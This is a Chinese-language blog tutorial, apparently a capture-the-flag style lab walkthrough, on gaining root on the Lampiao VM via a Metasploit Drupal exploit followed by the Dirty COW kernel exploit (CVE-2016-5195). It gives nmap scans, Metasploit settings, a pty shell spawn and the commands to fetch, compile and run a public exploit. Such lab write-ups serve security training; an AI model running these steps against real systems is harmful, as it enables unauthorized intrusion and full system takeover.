Linux脏牛(CVE-2016-5195)提权保姆级教程

脏牛提权 CVE-2016-5195:

该漏洞是 Linux 内核的内存子系统在处理写时拷贝(Copy-on-Write)时存在条件竞争漏洞, 导致可以破坏私有只读内存映射。黑客可以在获取低权限的的本地用户后,利用此漏洞获取  其他只读内存映射的写权限,进一步获取 root 权限。脏牛在Linux提权中比较重要,这里详细讲解一下。

一、靶场环境搭建准备阶段

1.下载vulhub靶机:lampiao

c4fac810cf9329d02062d77df3426cc4.png

2.下载后解压到某个目录:

 

1091383c6b316da91cea8b89845d01bb.png

3.打开我们的靶机和攻击机kali,将他们都设置为NAT模式

 

32fc3427eb9dc50d3ee77f6a74fd5900.png

0a06976bbb7941deb3a97e9ed2e6152d.png

靶机保持上图样式

二、信息收集阶段

1.进入kali,查看本机ip

 

3574b7fd0790ad7c61a95b56e2cda4e7.png

2.进行端口同网段端口扫描:

nmap -sS 192.168.153.0/24

9cb0791dfb35ef649ed764b1e88fa45f.png

3.探测到靶机的ip并获知其开放的22和80端口,对这个ip进行全端口扫描

nmap -p 1-65535 192.168.153.139

 

72d7e4bf9a856de1d3e7e3de27ca6d6c.png

4.观察到开放了1898端口,进入浏览器输入该ip和端口进行访问。

 

e45a8bc961df830600a94a9fd8594f85.png

5.可以看到该网页,滑动窗口在最下面看到一个“Powered by Drupal”

 

1f174a4eabf27021bfb29d45be63dd89.png

6.“msf”,启动!

 

090f18b7fefcb80db92570c0eda68fff.png

7.输入 search Drupal寻找攻击模块,这里我们使用第二个,并查看当前options

 

ce851277dbd004e233f5bef063e6cd4b.png

8.msf设置:

设置靶机ip

set RHOSTS 192.168.153.139

设置端口

set RPORT 1898

运行

run

 

d6023593f1da3aa5a863f9d17b03b916.png

9两种信息收集方式

2.9.1:使用uname -a,找到相应的版本,并查看是否可以有相关漏洞可以利用

 

0e0981ea6610ca60559c93d446ffce58.png

查询对应的版本,猜测可能存在脏牛漏洞(为什么猜测存在脏牛,直白点就是我打的就是脏牛靶场,隐晦点就是通过相关版本可能存在相关漏洞,具体有没有还不清楚,不过也得尝试一下)

2.9.2:使用相关探针进行探测,这里我们使用linux-exploit-suggester.sh

下载方式

git clone https://github.com/mzet-/linux-exploit-suggester

10.在msf中将目录切换到/tmp目录下

 

ee829aec9fdf0d2370c2ab026b06ce24.png

12.将我们下载的漏洞探针文件上传到靶机的tmp目录下并命名为1.sh

a71c2b75df3bd972869f3d17e645d8e7.png

13.进入shell会话,我们首先输入./1.sh会发现无法运行该命令,没有运行的权限,输入chmod +x 1.sh(给其运行的权限)后,输入./1.sh重新运行.

09e1c17f35b30a35ccad94dfd80ebed0.png

这里可以看到存在相关的漏洞

0501b80b431e8f96264c3be7a30de5c3.png

三、提权阶段

1.信息收集完毕后,下载相应的提权文件

git clone https://github.com/gbonacini/CVE-2016-5195

85ae3056a5fda9e35b20ee15ba4ef39c.png

2.先上传到目标主机中 upload /root/d cow.cop(如果目标是出网的,可以尝试直接下载该exp)

3.在我们的shell界面上输入

g++ -Wall -pedantic -o2 -std=c++11 -pthread -o dcow dcow.cpp -lutil

将dcow.cpp编译成dcow(可执行文件)

4c4ea93258d3ed3d81926a30941d3b67.png

4.创建一个会话(因为需要特定的会话才能运行这个dcow文件)

python -c 'import pty; pty.spawn("/bin/bash")'

5.输入./dcow执行dcow这个程序

3189c2a18b19c9b67196b18c015d14b2.png

6.使用ssh远程连接,切换成功。

ebb52c52c18f1d4adefcff75885cb549.png

 

 

  • 1
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

B10SS0MS

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值